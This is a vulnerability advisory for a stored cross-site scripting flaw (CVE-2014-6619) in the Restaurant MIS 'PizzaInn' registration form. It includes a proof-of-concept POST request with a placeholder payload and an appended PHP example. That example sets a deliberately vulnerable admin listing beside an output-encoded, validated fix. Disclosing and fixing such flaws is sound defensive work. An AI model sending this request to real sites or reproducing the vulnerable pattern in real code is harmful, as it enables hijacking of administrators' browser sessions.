Title: Pizza Inn Registration Stored XSS
Severity: High
CVE-ID: CVE-2014-6619
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
          http://xssWarrior.com
          http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/restaurantmis/
Vendor:
Remote Exploit: Yes

Discovered with: xssWarrior - http://xssWarrior.com

Description:
============

Script submitted in the registration form is stored unsanitized in the database. When the administrator views the list of new sign-ups, the stored script is rendered unencoded and executes in the administrator's browser.

Proof of Concept:
=================

http://[domain]/PizzaInn/register-exec.php

fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register
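As an added example (not part of this advisory or of the Restaurant MIS code), the vulnerable admin-listing pattern is shown beside a hardened version in PHP, together with input validation for the register-exec.php fields; the users table, its column names, and the $pdo handle are assumptions.

```php
<?php
// Added example, not the project's code. Assumes a "users" table with
// fname/lname/login columns and an existing PDO connection in $pdo.

// Vulnerable pattern: stored registration fields are echoed into the
// administrator's sign-up list as-is, so markup submitted through
// register-exec.php is interpreted by the administrator's browser.
function renderSignupsVulnerable(PDO $pdo): string {
    $html = '<table>';
    foreach ($pdo->query('SELECT fname, lname, login FROM users') as $row) {
        $html .= "<tr><td>{$row['fname']}</td><td>{$row['lname']}</td>"
               . "<td>{$row['login']}</td></tr>";
    }
    return $html . '</table>';
}

// Hardened pattern: every stored value is HTML-encoded at output time.
// ENT_QUOTES also encodes single quotes, so the value cannot break out of
// an attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from truncating output.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderSignupsSafe(PDO $pdo): string {
    $html = '<table>';
    foreach ($pdo->query('SELECT fname, lname, login FROM users') as $row) {
        $html .= '<tr><td>' . e($row['fname']) . '</td><td>' . e($row['lname'])
               . '</td><td>' . e($row['login']) . '</td></tr>';
    }
    return $html . '</table>';
}

// Defence in depth on the registration side (the register-exec.php handler):
// reject names and logins that contain markup characters or are overlong
// before they reach the database. Output encoding above remains the primary fix.
function validateRegistration(array $post): array {
    $errors = [];
    foreach (['fname', 'lname', 'login'] as $field) {
        $value = $post[$field] ?? '';
        // Letters, digits, space, dot, apostrophe and hyphen, 1 to 64 characters.
        if (!preg_match("/^[\\p{L}\\p{N} .'-]{1,64}$/u", $value)) {
            $errors[] = "$field contains disallowed characters or is too long";
        }
    }
    return $errors;
}
```

Applying validateRegistration() to $_POST in the registration handler and switching the admin page to renderSignupsSafe() closes the stored XSS described above; a Content-Security-Policy header on the admin pages further limits the impact of any encoding gap that remains.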